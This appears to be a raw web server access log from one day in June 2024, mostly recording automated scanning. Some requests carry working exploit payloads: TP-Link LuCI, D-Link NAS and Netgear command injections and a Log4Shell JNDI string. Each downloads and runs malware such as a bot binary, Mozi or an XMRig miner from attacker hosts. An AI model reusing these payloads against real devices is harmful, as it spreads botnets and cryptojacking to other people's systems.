95.167.182.76 - - [21/Jun/2024:00:14:59 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [21/Jun/2024:00:23:19 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
57.151.70.229 - - [21/Jun/2024:00:25:57 +0200] "GET /hudson HTTP/1.1" 404 724
45.148.10.174 - - [21/Jun/2024:00:35:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [21/Jun/2024:00:35:18 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
78.108.177.51 - - [21/Jun/2024:00:37:21 +0200] "GET / HTTP/1.0" 200 1895
141.98.11.15 - - [21/Jun/2024:00:56:06 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
157.230.18.50 - - [21/Jun/2024:01:06:55 +0200] "-" 400 1930
157.230.18.50 - - [21/Jun/2024:01:06:55 +0200] "-" 400 1930
157.230.18.50 - - [21/Jun/2024:01:06:55 +0200] "GET / HTTP/1.1" 200 1895
157.230.18.50 - - [21/Jun/2024:01:06:55 +0200] "GET /download/powershell/ HTTP/1.1" 404 746
220.90.89.154 - - [21/Jun/2024:01:33:39 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771
185.91.69.110 - - [21/Jun/2024:01:42:27 +0200] "-" 400 1930
185.91.69.110 - - [21/Jun/2024:01:42:28 +0200] "-" 400 1930
185.91.69.110 - - [21/Jun/2024:01:42:29 +0200] "-" 400 1930
185.91.69.110 - - [21/Jun/2024:01:42:31 +0200] "-" 400 1930
185.91.69.110 - - [21/Jun/2024:01:42:32 +0200] "-" 400 1930
185.91.69.110 - - [21/Jun/2024:01:42:34 +0200] "GET / HTTP/1.1" 200 1895
185.91.69.110 - - [21/Jun/2024:01:42:35 +0200] "POST / HTTP/1.1" 200 1895
185.91.69.110 - - [21/Jun/2024:01:42:37 +0200] "POST / HTTP/1.1" 200 1895
185.91.69.110 - - [21/Jun/2024:01:42:38 +0200] "GET /WuEL HTTP/1.1" 404 722
185.91.69.110 - - [21/Jun/2024:01:42:39 +0200] "GET stager64 HTTP/1.1" 400 804
185.91.69.110 - - [21/Jun/2024:01:42:41 +0200] "GET /a HTTP/1.1" 404 719
185.91.69.110 - - [21/Jun/2024:01:42:42 +0200] "GET /download/file.ext HTTP/1.1" 404 739
185.91.69.110 - - [21/Jun/2024:01:42:44 +0200] "GET /SiteLoader HTTP/1.1" 404 728
185.91.69.110 - - [21/Jun/2024:01:42:45 +0200] "GET /mPlayer HTTP/1.1" 404 725
185.91.69.110 - - [21/Jun/2024:01:42:47 +0200] "POST / HTTP/1.1" 200 1895
206.168.32.97 - - [21/Jun/2024:02:10:29 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.97 - - [21/Jun/2024:02:10:33 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.97 - - [21/Jun/2024:02:10:33 +0200] "GET /favicon.ico HTTP/1.1" 404 729
85.105.99.202 - - [21/Jun/2024:02:19:59 +0200] "GET / HTTP/1.0" 200 1895
147.185.132.19 - - [21/Jun/2024:02:25:02 +0200] "-" 400 1930
147.185.132.19 - - [21/Jun/2024:02:25:02 +0200] "-" 400 1930
45.141.86.171 - - [21/Jun/2024:02:43:10 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
94.156.71.233 - - [21/Jun/2024:02:44:15 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804
64.62.156.103 - - [21/Jun/2024:02:51:05 +0200] "GET / HTTP/1.1" 200 1895
64.62.156.100 - - [21/Jun/2024:02:51:36 +0200] "GET /favicon.ico HTTP/1.1" 404 729
64.62.156.104 - - [21/Jun/2024:02:51:55 +0200] "GET /?format=json HTTP/1.1" 200 1895
64.62.156.106 - - [21/Jun/2024:02:52:08 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804
217.181.171.195 - - [21/Jun/2024:03:17:14 +0200] "GET / HTTP/1.0" 200 1895
45.148.10.174 - - [21/Jun/2024:04:09:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [21/Jun/2024:04:09:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
64.112.72.166 - - [21/Jun/2024:04:10:40 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804
178.215.236.52 - - [21/Jun/2024:04:23:05 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804
87.121.69.27 - - [21/Jun/2024:04:24:41 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
95.214.55.144 - - [21/Jun/2024:04:36:09 +0200] "GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//149.12.245.132:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27) HTTP/1.1" 404 1214
120.137.255.169 - - [21/Jun/2024:04:47:28 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771
159.223.149.179 - - [21/Jun/2024:05:17:03 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804
159.223.149.179 - - [21/Jun/2024:05:18:09 +0200] "-" 400 1930
206.168.32.99 - - [21/Jun/2024:05:45:06 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.99 - - [21/Jun/2024:05:45:10 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.99 - - [21/Jun/2024:05:45:10 +0200] "GET /favicon.ico HTTP/1.1" 404 729
139.59.154.62 - - [21/Jun/2024:06:16:36 +0200] "GET /v2/_catalog HTTP/1.1" 404 733
87.121.69.27 - - [21/Jun/2024:06:59:24 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
102.129.252.240 - - [21/Jun/2024:07:15:55 +0200] "-" 400 1930
141.98.11.15 - - [21/Jun/2024:07:18:21 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
205.210.31.76 - - [21/Jun/2024:07:27:50 +0200] "GET / HTTP/1.1" 200 1895
45.148.10.174 - - [21/Jun/2024:08:12:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [21/Jun/2024:08:12:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
45.128.232.200 - - [21/Jun/2024:08:21:56 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
141.98.83.197 - - [21/Jun/2024:08:46:42 +0200] "GET /cgi-bin/nas_sharing.cgi?cmd=15&passwd=&system=ZWNobwktZQkiXHg2M1x4NjRceDIwXHgyZlx4NzRceDZkXHg3MFx4M2JceDIwXHg3Mlx4NmRceDIwXHgyZFx4NzJceDY2XHgyMFx4NzNceDY4XHg2Ylx4M2JceDIwXHg3N1x4NjdceDY1XHg3NFx4MjBceDY4XHg3NFx4NzRceDcwXHgzYVx4MmZceDJmXHgzNFx4MzVceDJlXHgzMVx4MzRceDM4XHgyZVx4MzFceDMwXHgyZVx4MzdceDM4XHgyZlx4NzNceDY4XHg2Ylx4MjBceDdjXHg3Y1x4MjBceDYzXHg3NVx4NzJceDZjXHgyMFx4MmRceDRmXHgyMFx4NjhceDc0XHg3NFx4NzBceDNhXHgyZlx4MmZceDM0XHgzNVx4MmVceDMxXHgzNFx4MzhceDJlXHgzMVx4MzBceDJlXHgzN1x4MzhceDJmXHg3M1x4NjhceDZiXHgyMFx4N2NceDdjXHgyMFx4NzRceDY2XHg3NFx4NzBceDIwXHgyZFx4NjdceDIwXHgyZFx4NzJceDIwXHg3M1x4NjhceDZiXHgyMFx4MzRceDM1XHgyZVx4MzFceDM0XHgzOFx4MmVceDMxXHgzMFx4MmVceDM3XHgzOFx4M2JceDIwXHg2M1x4NjhceDZkXHg2Zlx4NjRceDIwXHgyYlx4NzhceDIwXHg3M1x4NjhceDZiXHgzYlx4MjBceDJlXHgyZlx4NzNceDY4XHg2Ylx4MjBceDY0XHg2Y1x4NjlceDZlXHg2Ylx4M2JceDIwXHg3Mlx4NmRceDIwXHgyZFx4NzJceDY2XHgyMFx4NzNceDY4XHg2Ylx4M2IifHNo&user=messagebus HTTP/1.1" 404 745
165.227.134.160 - - [21/Jun/2024:08:46:54 +0200] "GET /v2/_catalog HTTP/1.1" 404 733
167.94.145.110 - - [21/Jun/2024:09:53:28 +0200] "GET / HTTP/1.1" 200 1895
167.94.145.110 - - [21/Jun/2024:09:53:31 +0200] "GET / HTTP/1.1" 200 1895
167.94.145.110 - - [21/Jun/2024:09:53:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729
45.148.10.174 - - [21/Jun/2024:10:00:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [21/Jun/2024:10:00:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
104.248.251.207 - - [21/Jun/2024:10:04:13 +0200] "GET /v2/_catalog HTTP/1.1" 404 733
87.121.69.27 - - [21/Jun/2024:10:14:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
167.94.146.59 - - [21/Jun/2024:10:21:22 +0200] "GET / HTTP/1.1" 200 1895
167.94.146.59 - - [21/Jun/2024:10:21:25 +0200] "GET / HTTP/1.1" 200 1895
167.94.146.59 - - [21/Jun/2024:10:21:25 +0200] "GET /favicon.ico HTTP/1.1" 404 729
91.92.245.67 - - [21/Jun/2024:10:40:51 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804
91.92.245.67 - - [21/Jun/2024:10:40:53 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
141.98.83.197 - - [21/Jun/2024:10:51:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
141.98.83.197 - - [21/Jun/2024:10:51:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
87.121.69.27 - - [21/Jun/2024:11:04:58 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
65.49.20.93 - - [21/Jun/2024:11:24:00 +0200] "-" 400 1930
194.165.16.73 - - [21/Jun/2024:11:28:46 +0200] "-" 400 1930
4.246.247.191 - - [21/Jun/2024:11:39:22 +0200] "-" 400 1930
198.235.24.69 - - [21/Jun/2024:12:09:00 +0200] "GET / HTTP/1.0" 200 1895
141.98.11.179 - - [21/Jun/2024:12:21:10 +0200] "CONNECT ecaravan.gr:443 HTTP/1.1" 400 804
91.92.245.67 - - [21/Jun/2024:12:28:11 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804
91.92.245.67 - - [21/Jun/2024:12:28:11 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
141.98.83.197 - - [21/Jun/2024:12:36:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
141.98.83.197 - - [21/Jun/2024:12:36:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
185.191.126.213 - - [21/Jun/2024:13:06:18 +0200] "GET / HTTP/1.1" 200 1895
87.121.69.27 - - [21/Jun/2024:13:09:18 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
141.98.83.197 - - [21/Jun/2024:13:25:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
141.98.83.197 - - [21/Jun/2024:13:25:54 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
154.201.87.185 - - [21/Jun/2024:13:48:18 +0200] "GET /manager/html HTTP/1.1" 401 2499
45.148.10.174 - - [21/Jun/2024:13:50:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [21/Jun/2024:13:50:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
87.236.176.252 - - [21/Jun/2024:14:17:29 +0200] "GET / HTTP/1.1" 200 1895
59.99.141.163 - - [21/Jun/2024:14:25:17 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.99.141.163:52615/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 727
103.252.136.86 - - [21/Jun/2024:14:29:33 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804
94.156.66.90 - - [21/Jun/2024:14:52:39 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804
185.244.36.206 - - [21/Jun/2024:15:34:18 +0200] "GET / HTTP/1.1" 200 1895
80.76.49.105 - - [21/Jun/2024:16:13:01 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804
45.148.10.174 - - [21/Jun/2024:16:16:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [21/Jun/2024:16:16:37 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
141.98.83.197 - - [21/Jun/2024:16:27:11 +0200] "GET / HTTP/1.1" 200 1895
194.59.31.99 - - [21/Jun/2024:16:53:25 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804
165.232.122.8 - - [21/Jun/2024:16:53:47 +0200] "-" 400 1930
165.232.122.8 - - [21/Jun/2024:16:53:47 +0200] "-" 400 1930
165.232.122.8 - - [21/Jun/2024:16:53:47 +0200] "GET / HTTP/1.1" 200 1895
165.232.122.8 - - [21/Jun/2024:16:53:47 +0200] "GET /download/powershell/ HTTP/1.1" 404 746
206.168.32.110 - - [21/Jun/2024:17:05:42 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.110 - - [21/Jun/2024:17:05:46 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.110 - - [21/Jun/2024:17:05:46 +0200] "GET /favicon.ico HTTP/1.1" 404 729
185.244.36.206 - - [21/Jun/2024:17:05:53 +0200] "GET / HTTP/1.1" 200 1895
165.154.58.251 - - [21/Jun/2024:17:18:48 +0200] "-" 400 1930
94.156.71.224 - - [21/Jun/2024:17:19:50 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804
84.54.51.164 - - [21/Jun/2024:17:28:45 +0200] "POST /login HTTP/1.1" 404 723
45.87.41.50 - - [21/Jun/2024:17:44:00 +0200] "POST /login HTTP/1.1" 404 723
141.98.83.197 - - [21/Jun/2024:17:54:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
141.98.83.197 - - [21/Jun/2024:17:54:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
87.121.69.27 - - [21/Jun/2024:18:09:52 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
80.76.49.131 - - [21/Jun/2024:18:55:12 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804
185.244.36.206 - - [21/Jun/2024:18:56:42 +0200] "GET / HTTP/1.1" 200 1895
141.98.11.15 - - [21/Jun/2024:20:03:01 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
141.98.83.197 - - [21/Jun/2024:20:07:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
141.98.83.197 - - [21/Jun/2024:20:07:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
104.168.70.165 - - [21/Jun/2024:20:07:21 +0200] "GET / HTTP/1.1" 200 1895
20.118.69.83 - - [21/Jun/2024:20:14:21 +0200] "GET / HTTP/1.1" 200 1895
185.244.36.206 - - [21/Jun/2024:20:23:39 +0200] "GET / HTTP/1.1" 200 1895
45.148.10.174 - - [21/Jun/2024:20:27:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
45.148.10.174 - - [21/Jun/2024:20:27:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
87.121.69.27 - - [21/Jun/2024:20:38:16 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804
41.45.14.60 - - [21/Jun/2024:21:41:47 +0200] "GET / HTTP/1.1" 200 1895
151.244.117.155 - - [21/Jun/2024:22:06:09 +0200] "GET / HTTP/1.1" 200 1895
164.90.174.121 - - [21/Jun/2024:22:50:30 +0200] "-" 400 1930
164.90.174.121 - - [21/Jun/2024:22:51:12 +0200] "GET /hello HTTP/1.1" 404 723
141.98.83.197 - - [21/Jun/2024:22:52:06 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756
141.98.83.197 - - [21/Jun/2024:22:52:06 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756
185.244.36.206 - - [21/Jun/2024:22:54:03 +0200] "GET / HTTP/1.1" 200 1895
45.128.232.200 - - [21/Jun/2024:23:05:05 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
206.168.32.101 - - [21/Jun/2024:23:23:41 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.101 - - [21/Jun/2024:23:23:44 +0200] "GET / HTTP/1.1" 200 1895
206.168.32.101 - - [21/Jun/2024:23:23:45 +0200] "GET /favicon.ico HTTP/1.1" 404 729
87.121.69.27 - - [21/Jun/2024:23:24:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804